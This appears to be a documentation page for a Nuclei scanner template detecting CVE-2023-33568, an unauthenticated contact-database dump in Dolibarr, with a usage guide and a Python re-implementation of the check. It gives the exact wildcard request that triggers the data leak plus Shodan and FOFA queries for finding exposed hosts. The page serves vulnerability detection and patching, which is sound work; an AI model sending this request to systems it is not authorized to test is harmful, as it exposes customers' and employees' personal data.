Dolibarr Unauthenticated Contacts Database Theft
ID: CVE-2023-33568
Severity: high
Author: DhiyaneshDK
Tags: cve2023,cve,dolibarr,unauth
Description
An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.
YAML Source
id: CVE-2023-33568

info:
  name: Dolibarr Unauthenticated Contacts Database Theft
  author: DhiyaneshDK
  severity: high
  description: |
    An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.
  impact: |
    The attacker can access and steal sensitive information from the contacts database, potentially leading to data breaches and privacy violations.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of Dolibarr to mitigate the vulnerability.
  reference:
    - https://www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33568
    - https://github.com/Dolibarr/dolibarr/commit/bb7b69ef43673ed403436eac05e0bc31d5033ff7
    - https://github.com/Dolibarr/dolibarr/commit/be82f51f68d738cce205f4ce5b469ef42ed82d9e
    - https://www.dolibarr.org/forum/t/dolibarr-16-0-security-breach/23471
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-33568
    cwe-id: CWE-552
    epss-score: 0.4855
    epss-percentile: 0.97483
    cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: dolibarr
    product: dolibarr_erp\/crm
    shodan-query: http.favicon.hash:440258421
    fofa-query: icon_hash=440258421
  tags: cve2023,cve,dolibarr,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"database_name":'
          - '"database_user":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e2f382f4fe295c23d845404261d745deac82a0a54d6dc9b72c8cd5f13c8af74d02207de30b7d94dee70a8aedf12760b2fe78d1725b9a2de4c8c9136f5a4ae00106d1:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template sends a single unauthenticated GET request (max-request: 1) to /public/ticket/ajax/ajax.php?action=getContacts&email=% on the target. The `%` value is the wildcard that makes the public ticket contact lookup return every record instead of one. Because matchers-condition is `and`, the host is reported only when the response status is 200 and the body contains both "database_name": and "database_user":. Run it with Nuclei against a host you are authorized to test; the -t path is resolved relative to the Nuclei templates directory, or you can pass the template's absolute path:

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-33568.yaml"

A match means the endpoint answered the wildcard lookup with a body carrying those keys, which the template treats as evidence of the pre-auth contact dump. Confirm the installed version (16.0.x before 16.0.5) before reporting, and remediate by upgrading to 16.0.5 or later.
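For readers who want to reproduce the template's decision outside Nuclei, or to understand exactly what a "match" is, the following stand-alone Python script re-implements the request and the matcher rules of the template above. It is an added example, not part of the Nuclei template or the Dolibarr project; the `cve-2023-33568-check` User-Agent is an arbitrary choice, the `SAMPLE_HIT` and `SAMPLE_MISS` bodies are constructed here to exercise the matcher offline and do not reproduce a real Dolibarr response, and the bare `%` in the path is sent unchanged as the template writes it.

```python
"""Re-implementation of the CVE-2023-33568 Nuclei template logic.

Added example for this page; not the template's own code and not Dolibarr code.
It mirrors the single GET request and the two matchers joined by
matchers-condition: and, so the result is the same yes/no decision Nuclei makes.
"""
import urllib.error
import urllib.request
from typing import Tuple

# Request path and body markers taken verbatim from the template.
CHECK_PATH = "/public/ticket/ajax/ajax.php?action=getContacts&email=%"
REQUIRED_WORDS = ('"database_name":', '"database_user":')

# Constructed sample bodies (assumed shape, not captured from a real host),
# used only so the matcher can be exercised without network access.
SAMPLE_HIT = (
    '[{"db":{"database_name":"dolibarr","database_user":"dolibarr"},'
    '"email":"user@example.com"}]'
)
SAMPLE_MISS = '{"error":"contact lookup disabled"}'


def build_url(base_url: str) -> str:
    """Mirror {{BaseURL}} substitution: strip a trailing slash, append the path."""
    return base_url.rstrip("/") + CHECK_PATH


def matches(status: int, body: str) -> bool:
    """Apply the template's matchers.

    word matcher (condition: and): every entry of REQUIRED_WORDS must appear in body.
    status matcher: status must be 200.
    matchers-condition: and: both matchers must pass.
    """
    word_matcher = all(word in body for word in REQUIRED_WORDS)
    status_matcher = status == 200
    return word_matcher and status_matcher


def fetch(base_url: str, timeout: float = 10.0) -> Tuple[int, str]:
    """Send the one GET the template sends and return (status, body).

    HTTP error responses are returned rather than raised so the matcher sees the
    real status code (a 403 or 500 must not be mistaken for a hit).
    """
    req = urllib.request.Request(
        build_url(base_url),
        headers={"User-Agent": "cve-2023-33568-check"},  # arbitrary UA, assumed
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", errors="replace")


def check(base_url: str) -> bool:
    """True when the target would be reported by the template."""
    status, body = fetch(base_url)
    return matches(status, body)


def offline_demo() -> Tuple[bool, bool]:
    """Run the matcher over the constructed samples: (hit, miss)."""
    return matches(200, SAMPLE_HIT), matches(200, SAMPLE_MISS)


if __name__ == "__main__":
    import sys

    if len(sys.argv) == 2:
        target = sys.argv[1]
        print("matched" if check(target) else "not matched", target)
    else:
        print("offline demo (hit, miss):", offline_demo())
```

Run it as `python3 check.py https://dolibarr.example.com` against an authorized target; without an argument it only exercises the matcher on the constructed samples. Note that, exactly like the template, a "not matched" result does not prove the host is patched: a WAF, a different status code, or a response that lacks the two keys all yield the same negative.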